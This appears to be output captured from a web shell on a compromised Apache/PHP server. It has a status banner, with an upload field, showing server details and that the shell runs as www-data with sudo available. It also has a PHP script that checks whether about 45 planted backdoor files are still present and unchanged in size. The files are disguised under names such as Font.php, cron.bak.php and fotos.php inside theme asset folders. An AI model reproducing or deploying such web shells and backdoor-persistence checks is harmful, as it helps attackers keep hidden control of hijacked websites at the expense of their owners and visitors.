| Server IP : 46.62.235.243 / Your IP : 216.73.216.217 Web Server : Apache/2.4.58 (Ubuntu) System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /tmp/ |
Upload File : |
<?php $r = '/var/www/linkabili/public'; $x = ["/theme/assets/img/Main.dwt.php"=>"bd@@276349208@@1023",
"/theme/assets/img/appointment/chinese.php"=>"bd@@276333605@@878",
"/theme/assets/img/contact/itransact.php"=>"bd@@276334117@@880",
"/theme/assets/js/enrol_authorize.php"=>"bd@@276349490@@918",
"/assets/backend/js/t.php"=>"bd@@276335437@@1019",
"/assets/frontend/js/bookmark.lib.php"=>"bd@@276335951@@960",
"/assets/backend/forum.inc.php"=>"bd@@276350031@@1015",
"/theme/assets/css/y.php"=>"bd@@276336474@@922",
"/assets/frontend/css/cancel.php"=>"bd@@276335709@@1002",
"/assets/backend/css/cron.bak.php"=>"bd@@276335225@@890",
"/theme/assets/img/home-two/template_blog.php"=>"bd@@276334467@@1038",
"/theme/assets/fonts/class.php"=>"bd@@276349319@@933",
"/fonts/vendor/pm.php"=>"bd@@276350343@@864",
"/fonts/vendor/slick-carousel/set_backlink.php"=>"bd@@276336264@@1027",
"/js/pcltar.php"=>"bd@@276349068@@938",
"/theme/assets/img/home-two/slider/barcodes4.php"=>"bd@@276319376@@898",
"/theme/assets/img/home-one/doctor/server_links.inc.php"=>"bd@@276319895@@981",
"/theme/assets/img/home-one/home-slider/board.php"=>"bd@@276319650@@923",
"/fonts/vendor/slick-carousel/slick/view_message.php"=>"bd@@276320163@@843",
"/css/chatify/getimage.php"=>"bd@@276349616@@939",
"/css/fotos.php"=>"bd@@276350919@@956",
"/theme/assets/img/home-three/edituser.php"=>"bd@@276321228@@869",
"/assets/frontend/Date.php"=>"bd@@276350166@@1069",
"/theme/assets/img/home-one/libmail.php"=>"bd@@276334842@@1002",
"/assets/backend/css/cron.bak.php"=>"bd@@276358282@@39",
"/css/fotos.php"=>"bd@@276358492@@48",
"/assets/backend/js/t.php"=>"bd@@276358925@@63",
"/assets/frontend/Date.php"=>"bd@@276359129@@94",
"/js/mssql.php"=>"bd@@276359335@@40",
"/theme/assets/img/home-one/home-slider/board.php"=>"bd@@276359534@@21",
"/assets/frontend/js/bookmark.lib.php"=>"bd@@276359771@@56",
"/theme/assets/img/doctor/support.php"=>"bd@@276359970@@9",
"/theme/assets/img/home-three/edituser.php"=>"bd@@276360193@@34",
"/multisite.php"=>"bd@@276360583@@50",
"/theme/assets/img/blog/main.inc.php"=>"bd@@276360783@@936",
"/theme/assets/img/doctor/Font.php"=>"bd@@276360925@@958",
"/theme/assets/img/doctor-detail/noncomp.php"=>"bd@@276361045@@948",
"/ConfigDef.php"=>"bd@@276361121@@878",
"/upload/certification/image_page.php"=>"bd@@276361212@@1078",
"/js/chatify/action.fesubmit.php"=>"bd@@276361299@@1003",
"/upload/beginedit8.php"=>"bd@@276361415@@930",
"/assets/db_common.inc.php"=>"bd@@276361500@@826",
"/fonts/mod_latestnews.php"=>"bd@@276361641@@936",
"/theme/assets/trade.notify.php"=>"bd@@276350737@@978",
"/theme/ot_subtotal.php"=>"bd@@276361710@@1054"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');